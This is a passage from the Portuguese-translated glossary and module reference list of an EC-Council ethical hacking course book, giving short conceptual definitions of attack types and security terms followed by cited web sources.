ÿ Rootkits: Rootkits são programas que ocultam sua presença, bem como as atividades maliciosas do invasor, concedendo-lhes acesso total ao servidor
ou host naquele momento e no futuro.
ÿ Serviços da Web RESTful: serviços da Web REpresentational State Transfer (RESTful) são projetados com base em um conjunto
de restrições usando conceitos HTTP subjacentes para melhorar o desempenho.
ÿ Replay Attack: Os atacantes gravam os comandos transmitidos por um operador e os reproduzem no sistema de destino para obter controle básico
sobre o sistema.
ÿ Teste de penetração baseado em equipe vermelha: O teste de penetração baseado em equipe vermelha é uma avaliação baseada em objetivo
adversário na qual o testador de penetração deve imitar o comportamento de um invasor real e atingir o ambiente.
ÿ Hackers suicidas: Hackers suicidas são indivíduos que visam derrubar infraestrutura crítica por uma “causa”
e não estão preocupados em enfrentar penas de prisão ou qualquer outro tipo de punição.
ÿ Script Kiddies: Script kiddies são hackers não qualificados que comprometem sistemas executando scripts, ferramentas e
software desenvolvido por hackers reais.
ÿ Hackers patrocinados pelo Estado : Hackers patrocinados pelo Estado são indivíduos qualificados com experiência em hacking e são empregados pelo
governo para penetrar, obter informações ultrassecretas e danificar os sistemas de informação de outras organizações governamentais ou militares.
ÿ Varredura: A varredura refere-se à fase de pré-ataque quando o invasor verifica a rede em busca de informações específicas com base nas informações
coletadas durante o reconhecimento
ÿ Sites de Spear-Phishing: Essa técnica é usada para imitar instituições legítimas, como bancos, para roubar senhas, dados de cartões de crédito e
contas bancárias e outras informações confidenciais.
ÿ E -mails de spam: Spam são e-mails irrelevantes, indesejados e não solicitados projetados para coletar informações financeiras
como números de segurança social e informações de rede.
ÿ Scareware: Scareware é um tipo de malware que induz os usuários de computador a visitar sites infestados de malware
sites ou baixar ou comprar software potencialmente malicioso.
ÿ Spyware: Spyware é um software furtivo de monitoramento de computador que permite gravar secretamente todas as atividades do usuário em um
computador de destino.
ÿ Banco de dados do Gerenciador de contas de segurança (SAM): o Windows usa o banco de dados do Gerenciador de contas de segurança (SAM)
ou o Banco de dados do Active Directory para gerenciar contas de usuário e senhas em formato hash.
ÿ Engenharia Social: A engenharia social é a arte de manipular as pessoas para divulgar informações confidenciais para
usá-lo para executar alguma ação maliciosa.
ÿ Shoulder Surfing: Shoulder surfing é a técnica de olhar por cima do ombro de alguém enquanto ele toca
informações em um dispositivo.
ÿ Spimming: SPIM (Spam over Instant Messaging) explora plataformas de mensagens instantâneas e usa mensagens instantâneas como uma ferramenta
para espalhar spam.
ÿ
Sniffing: Sniffing é geralmente usado por administradores de rede para realizar análises de rede, solucionar problemas de rede e monitorar sessões
de rede.
ÿ Ataque Smurf: Em um ataque Smurf, o invasor falsifica o endereço IP de origem com o endereço IP da vítima e
envia um grande número de pacotes de solicitação ICMP ECHO para uma rede de transmissão IP.

Glossário
ÿ Ataque de inundação SYN: Em um ataque SYN, o invasor envia um grande número de solicitações SYN ao servidor de destino
(vítima) com endereços IP de origem falsos.
ÿ Sequestro de sessão: Sequestro de sessão refere-se a um ataque no qual um invasor assume o controle de um TCP válido
sessão de comunicação entre dois computadores.
ÿ Spoofing: Um invasor finge ser outro usuário ou máquina (vítima) para obter acesso.
ÿ Raiz do Servidor: É o diretório raiz de nível superior sob a árvore de diretórios em que são armazenados os arquivos de configuração e erro,
executáveis e de log do servidor.
ÿ SOAP Web Services: O Simple Object Access Protocol (SOAP) define o formato XML e é usado para
transferir dados entre um provedor de serviços e um solicitante.
ÿ Exposição de dados confidenciais: A exposição de dados confidenciais ocorre devido a falhas como armazenamento criptográfico inseguro
e vazamento de informações.
ÿ Injeção de SQL: A injeção de SQL é uma técnica usada para tirar proveito de vulnerabilidades de entrada não sanitizadas para
passar comandos SQL por meio de um aplicativo da Web para execução por um banco de dados de back-end.
ÿ Service Set Identifier (SSID): Um SSID é um identificador exclusivo de 32 caracteres alfanuméricos fornecido a um
rede local (WLAN) que atua como um identificador sem fio da rede.
ÿ Ataque de phishing por SMS: phishing por SMS (também conhecido como SMiShing) é um tipo de fraude de phishing em que um invasor usa
sistemas de SMS para enviar mensagens de texto falsas.
ÿ SS7: Signalling System 7 (SS7) é um protocolo de comunicação que permite aos usuários móveis trocar comunicação através de outra rede
celular.
ÿ Simjacker: Simjacker é uma vulnerabilidade associada ao navegador S@T de um cartão SIM, um software pré-instalado
em cartões SIM projetados para fornecer um conjunto de instruções.
ÿ Rádio definido por software (SDR): O rádio definido por software (SDR) é um método de geração de comunicações de rádio e implementação
de processamento de sinal usando software (ou firmware), em vez do método usual de usar hardware.
ÿ Software-as-a-Service (SaaS): Oferece software aplicativo para assinantes sob demanda pela Internet.
ÿ Security-as-a-Service (SECaaS): Fornece testes de penetração, autenticação, detecção de intrusão, anti

malware, incidente de segurança e serviços de gerenciamento de eventos.
ÿ Auditoria de segurança: Uma auditoria de segurança verifica se uma organização segue um conjunto de políticas de segurança padrão
e procedimentos.
T
ÿ
Táticas, Técnicas e Procedimentos (TTPs): O termo Táticas, Técnicas e Procedimentos (TTPs) refere-se aos padrões de atividades e
métodos associados a agentes de ameaças específicos ou grupos de agentes de ameaças.
ÿ
Táticas: “Táticas” são as diretrizes que descrevem a forma como um atacante executa o ataque do começo ao fim.
ÿ Técnicas: “Técnicas” são os métodos técnicos usados por um invasor para obter resultados intermediários
durante o ataque.
ÿ Ameaça: Uma ameaça é a ocorrência potencial de um evento indesejável que pode eventualmente danificar e interromper
as atividades operacionais e funcionais de uma organização.
ÿ Utilização não autorizada: A utilização não autorizada implica o acesso a um edifício ou área segura sem o consentimento do autorizado
pessoa.
ÿ Tautologia: Em um ataque de injeção de SQL baseado em tautologia, um invasor usa uma cláusula OR condicional de modo que a condição
da cláusula WHERE sempre seja verdadeira.

Glossário
ÿ Trojan: Trojan é um programa no qual um código malicioso ou prejudicial está contido dentro de um
programa ou dados, que podem posteriormente ganhar controle e causar danos.
ÿ TKIP: É um protocolo de segurança utilizado no WPA em substituição ao WEP.
ÿ Análise de tempo: os invasores monitoram a quantidade de tempo que o dispositivo leva para concluir uma senha completa
processo de autenticação para determinar o número de caracteres corretos.
ÿ Riscos Técnicos: Este tipo de risco surge diretamente com alvos no ambiente de produção.
NO
ÿ Ameaças não intencionais: ameaças não intencionais são ameaças que existem devido ao potencial de
erros que ocorrem dentro da organização.
ÿ Ataque de inundação de UDP: em um ataque de inundação de UDP, um invasor envia pacotes UDP falsificados a uma taxa de pacotes muito alta
para um host remoto em portas aleatórias de um servidor de destino usando um grande intervalo de IP de origem.
ÿ Entradas não validadas: Refere-se a uma vulnerabilidade de aplicativo da web em que a entrada de um cliente não é validada
antes de serem processados por aplicativos da web e servidores de back-end.
ÿ Union SQL Injection: Em uma injeção UNION SQL, um invasor combina uma consulta forjada com uma consulta solicitada
pelo usuário usando uma cláusula UNION.
NO
ÿ Vírus: Um vírus é um programa autorreplicante que produz sua própria cópia anexando-se a outro programa,
setor de inicialização do computador ou documento.
ÿ Vulnerabilidade: Uma vulnerabilidade refere-se a uma fraqueza no projeto ou implementação de um sistema que pode ser explorada para
comprometer a segurança do sistema.
ÿ Avaliação de vulnerabilidade: Uma avaliação de vulnerabilidade é um exame aprofundado da capacidade de um sistema ou aplicativo, incluindo
procedimentos e controles de segurança atuais, de resistir à exploração.
ÿ Exploração de vulnerabilidades : A exploração de vulnerabilidades envolve a execução de múltiplos processos complexos,

etapas inter-relacionadas para obter acesso a um sistema remoto.
ÿ Vishing: Vishing (phishing de voz ou VoIP) é uma técnica de representação na qual o invasor usa a tecnologia Voz sobre IP (VoIP) para induzir os
indivíduos a revelar suas informações financeiras e pessoais críticas e usar as informações para obter ganhos financeiros.
ÿ Hospedagem Virtual: É uma técnica de hospedagem de vários domínios ou sites no mesmo servidor.
ÿ Árvore de Documento Virtual: Uma árvore de documento virtual fornece armazenamento em uma máquina ou disco diferente após o
disco original fica cheio.
ÿ Virtualização: A virtualização é a capacidade de executar vários sistemas operacionais em um único sistema físico e
compartilhe os recursos subjacentes, como um servidor, dispositivo de armazenamento ou rede.
No
ÿ Armamento: O adversário analisa os dados coletados para identificar as vulnerabilidades e técnicas

que podem explorar e obter acesso não autorizado à organização de destino.
ÿ White Hats: White hats ou testadores de penetração são indivíduos que usam suas habilidades de hacker para defesa
propósitos e também são conhecidos como analistas de segurança.
ÿ Wire Sniffing: Packet sniffing é uma forma de sniffing ou escuta telefônica na qual os hackers detectam credenciais durante o trânsito, capturando
pacotes da Internet.
ÿ Whaling: Um ataque de baleação é um tipo de phishing que visa executivos de alto nível, como CEO, CFO, políticos e celebridades que têm acesso
total a informações confidenciais e altamente valiosas.
Glossário Página 901 Ethical Hacking Essentials Copyright © por EC-Council Todos

Glossário
ÿ Avaliação de rede sem fio: A avaliação de rede sem fio determina as vulnerabilidades em um
redes sem fio da organização.
ÿ Servidor da Web: Um servidor da Web é um sistema de computador que armazena, processa e entrega páginas da Web aos clientes
via HTTP.
ÿ Web Proxy: Um servidor proxy está localizado entre o cliente Web e o servidor Web para evitar o bloqueio de IP e
manter o anonimato.
ÿ Desfiguração do site: A desfiguração da Web ocorre quando um intruso altera maliciosamente a aparência visual
de uma página da web inserindo ou substituindo dados provocativos e frequentemente ofensivos.
ÿ Configuração incorreta do servidor da Web: A configuração incorreta do servidor refere-se a pontos fracos de configuração na infraestrutura
da Web que podem ser explorados para lançar vários ataques a servidores da Web, como travessia de diretório, invasão de servidor e
roubo de dados.
ÿ Aplicativos da Web: Aplicativos da Web são programas de software executados em navegadores da Web e agem como
interface entre usuários e servidores web através de páginas web.
ÿ Serviços da Web: Um serviço da Web é um aplicativo ou software implantado na Internet. Ele usa um protocolo de mensagens padrão
(como SOAP) para permitir a comunicação entre aplicativos desenvolvidos em diferentes plataformas.
ÿ Rede sem fio : Rede sem fio (Wi-Fi) refere-se a WLANs baseadas no padrão IEEE 802.11, que permite que o dispositivo acesse a rede de
qualquer lugar dentro do alcance de um AP.
ÿ WEP: WEP é um algoritmo de criptografia para redes sem fio IEEE 802.11. É uma segurança sem fio antiga
padrão e pode ser quebrado facilmente.
ÿ WPA: É um protocolo avançado de criptografia sem fio que usa TKIP e Message Integrity Check (MIC) para fornecer criptografia e
autenticação fortes.
ÿ WPA2: É uma atualização para WPA usando AES e o Protocolo de Código de Autenticação de Mensagem em Cadeia de Bloco de Cifra de
Modo Contador (CCMP) para criptografia de dados sem fio.
ÿ WPA2 Enterprise: Integra padrões EAP com criptografia WPA2.
ÿ WPA3: É um protocolo de segurança Wi-Fi de terceira geração que oferece novos recursos para uso pessoal e
uso empresarial.
ÿ Ataque de envolvimento: Um ataque de envolvimento é executado durante a tradução da mensagem SOAP na camada TLS, onde os
invasores duplicam o corpo da mensagem e o enviam ao servidor como um usuário legítimo.
ÿ Entidade Externa XML (XXE): o ataque de Entidade Externa XML é um ataque de falsificação de solicitação do lado do servidor (SSRF)
que pode ocorrer quando um analisador XML mal configurado permite que os aplicativos analisem a entrada XML de uma fonte não confiável.
A PARTIR DE
ÿ Zonas e conduítes: Uma técnica de segregação de rede usada para isolar as redes e ativos para impor e manter fortes mecanismos de
controle de acesso.

Referências
Referências
Módulo 01: Fundamentos de Segurança da Informação
1. (2006), The Cybercrime Act 2001 Austrália, Alemanha, Cingapura Capítulo 50A: Lei de uso indevido de computadores, de http://
www.cybercrimelaw.net/laws/countries/australia.html, http://www.cybercrimelaw.net/laws /countries/germany.html, http://
www.mosstingrett.no/info/legal.html#29.
2. (2006), Computer Misuse Act 1990 Capítulo 18 Acesso não autorizado a material informático, em http://
www.cybercrimelaw.net/laws/countries/uk.html.
3. Lei da Polícia e Justiça de 2006, http://www.opsi.gov.uk/acts/acts2006/ukpga_20060048_en_7#pt5-pb2.
4. Sra. Mousami Pawar, (2014), Network Security, de http://www.slideshare.net/mousmip/network-security-fundamental.
5. John E. Canavan, Fundamentals of Network Security, em https://

www.askcypert.org/sites/default/files/Canavan_J.E._Fundamentals_of_network_security_(2001)(en)(218s).pdf.
6. O que é Segurança da Informação?, em http://demop.com/articles/what-is-information-security.pdf.
7. Vangie Beal, ataque interno, de https://www.webopedia.com/definitions/insider-attack/.
8. Visão geral dos padrões de segurança de dados do PCI SSC, em https://www.pcisecuritystandards.org/pci_security/how.
9. (2010), Padrão de Segurança de Dados da Indústria de Cartões de Pagamento (PCI),

de https://www.pcisecuritystandards.org/document_library?category=pcidss&document=pci_dss.
10. ISO/IEC 27001:2013, de https://www.iso.org/standard/54534.html.
11. Privacidade das informações de saúde, em https://www.hhs.gov/hipaa/index.html.
12. (2002), PUBLIC LEI 107–204—JULHO 30, de https://www.sec.gov/answers/about-lawsshtml.html#sox2002.
13. Resumo executivo Relatório da Seção 104 da Lei de Direitos Autorais do Milênio Digital, disponível
em https://www.copyright.gov/reports/studies/dmca/dmca_executive.html.
14. (1998), The Digital Millennium Copyright Act of 1998 US Copyright Office Summary, from
https://www.copyright.gov/legislation/dmca.pdf.
15. (2002), Projeto de Implementação da Lei Federal de Gerenciamento de Segurança da Informação (FISMA), de
https://csrc.nist.gov/projects/risk-management.
16. Joe Jenkins, (2000), Internet Security and Your Business - Conhecendo os riscos, de https://
community.broadcom.com/symantecenterprise/communities/community home/librarydocuments/
viewdocument?DocumentKey=22da83c8-8a6a-4fa9-aa58 -
5d5b4925f625&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments.
17. Mark Winston Egan, Tim Mather, (2004), An Executive's Information Security Challenge, em https://www.informit.com/
articles/article.aspx?p=368647&seqNum=3.
18. Algirde Pipikaite, Marc Barrachin, Scott Crawford, (2021), Estes são os principais desafios de segurança cibernética de 2021, em https://
www.weforum.org/agenda/2021/01/top-cybersecurity-challenges-of-2021 /.
19. Bricata, (2019), Os 10 principais desafios de segurança de rede em 2019, em https://bricata.com/blog/top-network-security

desafios - 2019/.
20. Kelson Lawrence, (2013), Network Security Part 1: Attacks0, de http://blog.boson.com/bid/88333/Network-Security

Parte-1-Ataques.
21. Diferentes classes de ataques de rede e como defendê-los, em http://www.omnisecu.com/ccna-security/different

classes-de-rede-ataques-e-como-defender-them.php.
22. Tipos comuns de ataques de rede, em https://www.vskills.in/certification/tutorial/wimax-4g-2/network-attacks/.
23. Lei de proteção de dados de 2018, CAPÍTULO 12, em

https://www.legislation.gov.uk/ukpga/2018/12/pdfs/ukpga_20180012_en.pdf.
Referências Página 903 Ethical Hacking Essentials Copyright © por EC-Council Todos

Referências
Módulo 02: Fundamentos do Hacking Ético
24. (2006), Ethical Hacking, de http://neworder.box.sk/news/921.
25. (2006), metodologia Hacker, de http://www.hackersecuritymeasures.com/.
26. Ian Sutherland, Is Ethical Hacking Actually Ethical or even Legal?, em https://ianhsutherland.com/ethical-hacking/.
27. O hacking ético é legal?, de https://www.answers.com/Q/Is_ethical_hacking_legal?#slide=2.
28. Morey Haber, (2017), What is the Difference Between a Threat Actor, Hacker and Attacker?, de https://
www.beyondtrust.com/blog/entry/difference-between-a-threat-actor-hacker- atacante.
29. Anthony Giandomenico, (2017), Know Your Enemy: Understanding Threat Actors, de
https://www.csoonline.com/article/3203804/security/know-your-enemy-understanding-threat-actors.html.
30. Margaret Rouse, (2012), Industrial Espionage, de https://whatis.techtarget.com/definition/industrial-espionage.
31. The Cyber Kill Chain®, em https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html.
32. O que é a Cyber Kill Chain?, de https://images.idgesg.net/images/article/2017/11/cyber-kill-chain-infographic

100741032-orig.jpg.
33. Tactics, Techniques, and Procedures, em https://azeria-labs.com/tactics-techniques-and-procedures-ttps/.
34. Ely Kahn, (2017), Threat Hunting: 10 Adversary Behaviors to Hunt For, em https://www.linkedin.com/pulse/threat hunting-10-
adversary-behaviors-hunt-ely-kahn/.
35. Margaret Rouse, (2017), servidor de comando e controle (servidor C&C), de

https://whatis.techtarget.com/definition/command-and-control-server-CC-server.
36. Agathoklis Prodromou, (2016), Detection and Prevention – An Introduction to Web-Shells – Final Part, from
https://www.acunetix.com/blog/articles/detection-prevention-introduction-web-shells-part-5/.
37. Aaron Shelmire, (2015), Detecting Web Shells in HTTP access logs, em https://www.anomali.com/blog/detecting-web shells-in-http-
access-logs.
38. Indicators of Compromise, em https://www.trendmicro.com/vinfo/us/security/definition/indicators-of-compromise.
39. Nate Lord, (2017), Quais são os indicadores de compromisso?, de https://digitalguardian.com/blog/what-are-indicators

compromisso.
40. Josh Ray, (2015), Compreendendo o cenário de ameaças: Indicadores de compromisso (IOCs), de
http://www.circleid.com/posts/20150625_understanding_the_threat_landscape_indicators_of_compromise_iocs/.
41. Ericka Chickowski, (2013), Top 15 Indicators Of Compromise, de https://www.darkreading.com/attacks-breaches/top-15-

indicadores-de-compromisso/d/d-id/1140647?page_number=2.
42. Identificando Atores de Ameaças, em https://blogs.getcertifiedgetahead.com/identifying-threat-actors/.
43. Ameaças internas na segurança cibernética: o que os empregadores podem fazer para se , a partir de
proteger? https://www.virtru.com/blog/insider-threats-in-cyber-security/.
44. O que é Shadow IT? 5 riscos do Shadow IT e como evitá-los, em https://kmicro.com/what-is-shadow-it/.
45. Michael Morrison, (2020), Ameaças de segurança associadas à sombra de TI, em

https://www.helpnetsecurity.com/2020/05/18/security-shadow-it/.
46. What is Cyber Espionage?, em https://www.vmware.com/topics/glossary/content/cyber-espionage.
47. (2017), Espionagem industrial é uma grande ameaça ao setor de manufatura, de https://iiot-world.com/ics security/
cybersecurity/industrial-espionage-is-a-major-threat-to-the-manufacturing -setor/.
48. Ameaças cibernéticas, métodos e motivações do Ator Estado-Nação, de

https://www.baesystems.com/en/cybersecurity/feature/the-nation-state-actor.
49. (2020), Shadow IT: Uncovering the Hidden Security Threat, em https://www.coreview.com/blog/shadow-it-hidden
ameaça de segurança/.
50. (2013), Os hackers do crime organizado são a verdadeira ameaça à infraestrutura americana, de
https://www.businessinsider.in/defense/infosec/organized-crime-hackers-are-the-true-threat-to-american Infrastructure/
articleshow/21039745.cms.

Referências
Módulo 03: Ameaças à Segurança da Informação e Avaliação de Vulnerabilidade
51. Calyptix, (2015), Top 7 Network Attack Types in 2015, em https://www.calyptix.com/top-threats/top-7-network-attack

tipos-em-2015-so-far/.
52. Ameaça, em https://www.techopedia.com/definition/25263/threat.
53. Rick Lutkus, (2015), Ameaça à Segurança da Informação: Exploits Tecnológicos, de

http://www.lawtechnologytoday.org/2015/05/information-security-threat-technological-exploits/.
54. Ameaças, vulnerabilidades e exploits, em https://www.icann.org/en/blogs/details/threats-vulnerabilities-and-exploits--oh

my-10-8-2015-en.
55. Ciberameaça, em https://www.techopedia.com/definition/25263/cyberthreat.
56. Tipos de ameaças, de https://en.wikipedia.org/wiki/Threat_(computer)#Threats_classification.
57. Tipos de ameaças de segurança,

de http://etutorials.org/Networking/Router+firewall+security/Part+I+Security+Overview+and+Firewalls/Chapter+1.+Security+
Threats/Types+of+Security+ Ameaças/.
58. Os quatro tipos principais de ameaças à rede, de

http://etutorials.org/Networking/Cisco+Certified+Security+Professional+Certification/Part+I+Introduction+to+Network+Security/
Chapter+1+Understanding+Network+Security+Threats/The+Four+Primary +Tipos+de+Ameaças+de+Rede/.
59. Ameaça, vulnerabilidade, risco – termos comumente misturados, de https://www.threatanalysis.com/2010/05/03/threat

vulnerabilidade-risk-commonly-mixed-up-terms/.
60. Commodon Communications - Ameaças à sua segurança na Internet, em http://

www.commodon.com/threat/index.htm.
61. David Wells, (1996), Wrappers, de http://www.objs.com/survey/wrap.htm.
62. Perguntas frequentes sobre cavalos de Tróia, em https://techgenix.com/trojans-faq/.
63. Candid Wueest, (2015), The State of Financial Trojans 2014, de https://docs.broadcom.com/docs/state-of-financial
trojans-2014-en.
64. (2013), Battling with Cyber Warriors- Exploit Kits, de https://resources.infosecinstitute.com/battling-cyber-warriors

exploit-kits/.
65. Joshua Cannell, (2013), Tools of the Trade: Exploit Kits, de https://blog.malwarebytes.com/cybercrime/2013/02/tools-of
the-trade-exploit-kits/.
66. Yotam Gottesman, (2014), RSA Uncovers New POS Malware Operation Stealing Payment Card & Personal Information, de https://
community.rsa.com/t5/rsa-netwitness-platform-blog/rsa-uncovers-new-pos -malware-operação-roubo-cartão de pagamento/ba-p/
519033.
67. Marshall Brain, How Computer Viruses Work, de http://www.mindpride.net/root/Extras/how-stuff works/

how_computer_viruses_work.htm.
68. Proteção contra vírus, em http://www.mindpride.net/root/services/virus_alert_map_advisory.htm.
69. Norman Book on Computer Viruses, de http://download.norman.no/manuals/eng/BOOKON.PDF.
70. Ransomware, de https://en.wikipedia.org/wiki/Ransomware.
71. Worms de computador, em https://userpages.umbc.edu/~dgorin1/432/worms.htm.
72. Worm, de https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/worm.
73. Ed Skoudis, (2003), Cavalos de Tróia, de https://www.informit.com/articles/article.aspx?p=102181&seqNum=2.
74. (2016), What Is A Banking Trojan And How Does It Work, de https://thecentexitguy.com/what-is-a-banking-trojan-and
como funciona/.
75. (2016), Kaspersky Security Bulletin 2016. História do ano A revolução do Ransomware, de
https://media.kaspersky.com/en/business-security/kaspersky-story-of-the-year-ransomware-revolution.pdf.
76. O que é o vírus FAT?, em https://www.easytechjunkie.com/what-is-the-fat-virus.htm.
77. Vírus de e-mail, de https://www.techopedia.com/definition/15802/email-virus.

Referências
78. (2016), Necurs Botnet Returns With Updated Locky Ransomware In Tow, de https://www.proofpoint.com/us/threat insight/post/necurs-botnet-
returns-with-updated-locky-ransomware-in- rebocar.
79. (2019), malware de ponto de venda, de https://en.wikipedia.org/wiki/Point-of-sale_malware.
80. (2013), Point-of-Sale Malware Threats, de https://www.secureworks.com/research/point-of-sale-malware-threats.
81. (2016), Ponto de venda (POS), em https://blog.malwarebytes.com/threats/point-of-sale-pos/.
82. (2017), Novos ataques de cavalos de Tróia a sistemas de pontos de venda em busca de informações sobre cartões, em https://www.cyberianit.com/2017/07/26/new
trojan-attacks-point-of-sale-systems-seeking-card-info/.
83. (2019), BasBanke: Trend-setting Brazilian banking Trojan, de https://securelist.com/basbanke-trend-setting-brazilian banking-trojan/90365/.
84. David Maciejak e Kenny Yongjian Yang, (2018), Dharma Ransomware: O que está nos ensinando, em https://
www.fortinet.com/blog/threat-research/dharma-ransomware--what-it-s-teaching -nós.
85. Lena Fuks, (2019), 10 ataques de ransomware que você deve conhecer em 2019, em https://www.allot.com/blog/10-
ransomware-ataques-2019/.
86. Ransomware, de https://www.trendmicro.com/vinfo/us/security/news/ransomware/page/1.
87. Allan Liska, (2019), 4 Ransomware Trends to Watch in 2019, em https://www.recordedfuture.com/ransomware-trends

2019/.
88. (2019), ameaças sem arquivo, de https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/fileless

ameaças.
89. Mary Branscombe, (2019), O que é malware sem arquivo e como você se protege contra ele?, de
https://www.techrepublic.com/article/what-is-fileless-malware-and-how-do-you-protect-against-it/.
90. Kate Brew, (2019), Fileless Malware Detection: A Crash Course, de https://cybersecurity.att.com/blogs/security
essentials/fileless-malware-detection.
91. Lenny Zeltser, (2018), How Fileless Malware Infections Start, em https://blog.minerva-labs.com/how-fileless-malware
infecções-start.
92. Jareth, (2017), Fileless malware: Invisible ameaça ou alarmismo hype?, de https://
blog.emsisoft.com/en/29070/fileless-malware-attacks/.
93. What Is Fileless Malware?, em https://www.mcafee.com/enterprise/en-in/security-awareness/ransomware/what-is

fileless-malware.html.
94. Ataques de malware sem arquivo, em https://d3pakblog.wordpress.com/2018/05/05/d34n6_fileless-malware-attacks-intro/.
95. Pedro Tavares, (2018), The Art of Fileless Malware, de https://resources.infosecinstitute.com/art-fileless-malware/#gref.
96. Edmund Brumaghin, (2019), Divergente: "Fileless" NodeJS Malware Burrows Deep Within the Host, de
https://blog.talosintelligence.com/2019/09/divergent-analysis.html.
97. Manohar Ghule e Mohd Sadique, (2019), Resumo da campanha de malware sem arquivo, em https://
www.zscaler.com/blogs/research/fileless-malware-campaign-roundup.
98. Dor Zvi, (2019), Ofuscated Fileless Malware in Cyberattackers' Toolkits: A Closer Look, de
https://www.mimecast.com/blog/2019/06/obfuscated-fileless-malware-in-cyberattackers-toolkits-a-closer-look/.
99. David Strom, (2019), Como defender sua organização contra ataques de malware sem arquivos, de
https://securityintelligence.com/how-to-defend-your-organization-against-fileless-malware-attacks/.
100. (2018), Fileless Malware: What It Is and How to Stop It, em https://www.tripwire.com/state-of-security/security
awareness/fileless-malware-stop/.
101. Sharron Malaver, (2018), How to Protect Against Fileless Malware Attacks, em https://blog.minerva-labs.com/how-to
proteger-contra-ataques-malware-sem-arquivo.
102. Margaret Rouse, (2019), ataque de malware sem arquivo, de https://whatis.techtarget.com/definition/fileless-infection-fileless

malware.
103. Stephen Cooper, (2018), Ataques de malware sem arquivo explicados, em https://www.comparitech.com/blog/information
security/fileless-malware-attacks/.

Referências
104. (2018), Fileless Malware the Stealth Attacker, de https://

www.allot.com/resources/TB_FILELESS_MALWARE_THREAT_BULLETIN.pd_.pdf.
105. Microsoft Vulnerability Research (MSVR), em https://www.microsoft.com/en-us/msrc/msvr.
106. Renaud Deraison e Ron Gula, (2009), Blended Security Assessments, de

https://www.tenable.com/sites/drupal.dmz.tenablesecurity.com/files/uploads/documents/whitepapers/Blended%20Security%20Assesments.pdf.
107. (2011), O que é uma avaliação de vulnerabilidade?, de http://resecure.me/pdf/17542.pdf. .
108. Marcelo Silva, (2012), Vulnerability Assessment, de https://www.slideshare.net/CelloLtd/info-security-vulnerability

avaliação.
109. Calculadora do sistema de pontuação de vulnerabilidade comum, em https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator.
110. (2019), Common Weakness Enumeration, de https://en.wikipedia.org/wiki/Common_Weakness_Enumeration.
111. (2015), Testing Scan Credentials for More Accurate Vulnerability Assessment, em https://www.tripwire.com/state-of
security/vulnerability-management/testing-scan-credentials-for-more-accurate-vulnerability-assessment/.
112. (2011), verificações credenciadas vs não credenciadas, em https://discussions.qualys.com/thread/10133.
113. Syamini Sreedharan, O que é Avaliação de Vulnerabilidade? Processo de teste, VAPT Scan Tool, em
https://www.guru99.com/vulnerability-assessment-testing-analysis.html.
114. Martin Hell, (2019), O que é uma ameaça à segurança?, em https://debricked.com/blog/2019/05/29/what-is-a-security-threat.
115. Stephen Watts, (2020), IT Security Vulnerability vs Threat vs Risk: What are the Differences?, de
https://www.bmc.com/blogs/security-vulnerability-vs-threat-vs-risk-whats-difference/.
116. O que é Adware? – Definição e explicação, em https://www.kaspersky.co.in/resource-center/threats/adwar.
117. Mark Gorrie, What Is Adware?, de https://us.norton.com/internetsecurity-emerging-threats-what-is-grayware-adware

e-madware.html.
118. Ellen Zhang, (2017), O que é Adware? Como funciona e como se proteger contra adware, de
https://digitalguardian.com/blog/what-adware-how-it-works-and-how-protect-yourself-against-adware.
119. Como se livrar do adware com essas 5 dicas, em http://solidsystemsllc.com/how-to-get-rid-of-adware/.
120. Vulnerabilidade de dia zero, em https://www.trendmicro.com/vinfo/us/security/definition/zero-day-vulnerability.
121. Bruce Schneier, (2013), Security Vulnerabilities of Legacy Code, de

https://www.schneier.com/blog/archives/2013/12/security_vulner_3.html.
Módulo 04: Técnicas de quebra de senha e contramedidas

122. Ricky Magalhães, (2003), Usando senhas como mecanismo de defesa para melhorar a segurança do Windows, de
http://techgenix.com/passwords_improve_windows_security_part2/.
123. DaijiSanai e HidenobuSeki, (2004), Optimized Attack for NTLM2 Session Response, de https://
www.blackhat.com/presentations/bh-asia-04/bh-jp-04-pdfs/bh-jp-04- seki.pdf.
124. Ataque de força bruta - Wikipedia, a enciclopédia livre, em https://en.wikipedia.org/wiki/Brute-force_attack.
125. Senhas, de http://media.techtarget.com/searchSecurity/downloads/HackingforDummiesCh07.pdf.
126. The Hack FAQ: Password Basics, em https://www.nmrc.org/pub/faq/hackfaq/hackfaq-04.html.
127. Fred B. Schneider, Authentication, de http://www.cs.cornell.edu/Courses/cs513/2000sp/NL10.html.
128. Srikanth Ramesh, How to Hack Windows Administrator Password, em https://www.gohacking.com/hack-windows

senha do administrador./.
129. Sarah Granger, (2002), The Simplest Security: A Guide To Better Password Practices, de https://
community.broadcom.com/groups/communities/community home/librarydocuments/viewdocument?
DocumentKey=bf676294-670c-4bb6- 9124- f25e50fd2f85&CommunityKey=60a22582-1783-4c99-880a-
e9aef704bce3&tab=librarydocuments.
130. Jesper M. Johansson, Senhas do Windows: tudo o que você precisa saber, de
http://download.microsoft.com/download/a/d/0/ad0f04a3-21b2-4d79-9049-f5fadb632ace/SEC401-JesperJohansson.pdf.

Referências
131. Dr-Hack, (2009), Ataques de injeção de hash em uma rede Windows, em https://blog.drhack.net/hash-injection-attacks-in-a
windows-network/.
132. Como impedir que o Windows armazene um hash do gerenciador de LAN de sua senha no Active Directory e bancos de dados SAM locais, em https://
docs.microsoft.com/en-US/troubleshoot/windows-server/windows-security/prevent- senha do windows-store-lm-hash.
133. Vincule a Resolução de Nome Multicast Local (LLMNR) e o Serviço de Nome NetBIOS (NBT-NS), de
https://www.cccsecuritycenter.org/remediation/llmnr-nbt-ns.
134. Jon Sternstein, Local Network Attacks: LLMNR and NBT-NS Poisoning, em https://www.sternsecurity.com/blog/local
rede-ataques-llmnr-e-nbt-ns-envenenamento.
135. LLMNR / NBT-NS Spoofing Attack Network Penetration Testing, em https://www.aptive.co.uk/blog/llmnr-nbt-ns

falsificação/.
136. Mucahit Karadag, (2016), O que é LLMNR & WPAD e como abusar deles durante o Pentest?, em https://pentest.blog/what-
is-llmnr-wpad-and-how-to-abuse-them- durante-pentest/.
137. William Hurer-Mackay, (2016), LLMNR e NBT-NS Poisoning Using Responder, em https://www.4armed.com/blog/llmnr nbtns-poisoning-using-responder/.
138. Vincule a resolução de nomes multicast local (LLMNR) e o serviço de nomes NetBIOS (NBT-NS), em https://
www.cccsecuritycenter.org/remediation/llmnr-nbt-ns.
